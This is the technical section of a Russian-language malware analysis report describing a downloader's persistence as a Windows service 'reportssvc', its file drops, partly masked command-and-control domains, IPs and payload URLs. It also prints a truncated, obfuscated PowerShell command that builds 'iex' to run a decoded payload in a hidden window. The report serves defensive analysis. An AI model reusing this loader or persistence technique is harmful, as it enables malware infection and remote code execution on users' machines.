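Техническая информация
Примечание: символы # в доменных именах и IP-адресах ниже скрывают часть символов, поэтому эти строки нельзя использовать как готовые индикаторы без восстановления полного значения.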
- [HKLM\System\CurrentControlSet\Services\reportssvc] 'Start' = '00000002' (значение 2 — автоматический запуск службы при загрузке системы)
- [HKLM\System\CurrentControlSet\Services\reportssvc] 'ImagePath' = '"%WINDIR%\SysWOW64\reportssvc.exe"'
- 'reportssvc' "%WINDIR%\SysWOW64\reportssvc.exe"
- 'reportssvc' %WINDIR%\SysWOW64\reportssvc.exe
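- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ((vArIaBLE '*MDR*').nAmE[3,11,2]-JOIn'') (([CHaR[]] (60, 105,80 , 126 , 37 ,118,125 , 111, 53,119 , 122, 114 ,125, 123, 108, 56,86 ,125 ,108, 54, 79,125, 122, 91 , 116 ,113 , 125,118 , 108 ,3... (команда обфусцирована и в отчёте обрезана; фрагмент (vArIaBLE '*MDR*').nAmE[3,11,2]-JOIn'' собирает строку «iex» — псевдоним Invoke-Expression — из имени переменной MaximumDriveCount, так что раскодированный массив символов, по-видимому, передаётся на выполнение)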
- %WINDIR%\syswow64\reportssvc.exe
- %TEMP%\65.exe
- %TEMP%\65.exe в %WINDIR%\syswow64\reportssvc.exe (исходный файл → путь назначения; этот же путь задан в ImagePath службы reportssvc)
- 'cl####lvoitalia.it':80
- 'er####nsulting.com':80
- 'go###nfell.ru':80
- 'mo###erljud.se':80
- '92.##.116.104':80
- '24.##3.127.246':443
- '24.##1.176.48':443
- http://er####nsulting.com/7I3eUNF/
- http://www.go###nfell.ru/media/5DzF30jL/
- http://www.mo###erljud.se/VJkuLg/
- DNS ASK cl####lvoitalia.it
- DNS ASK er####nsulting.com
- DNS ASK go###nfell.ru
- DNS ASK jm###sical.jp
- DNS ASK mo###erljud.se
- '%TEMP%\65.exe'
- '%WINDIR%\syswow64\reportssvc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ((vArIaBLE '*MDR*').nAmE[3,11,2]-JOIn'') (([CHaR[]] (60, 105,80 , 126 , 37 ,118,125 , 111, 53,119 , 122, 114 ,125, 123, 108, 56,86 ,125 ,108, 54, 79,125, 122, 91 , 116 ,113 , 125,118 , 108 ,3...' (со скрытым окном)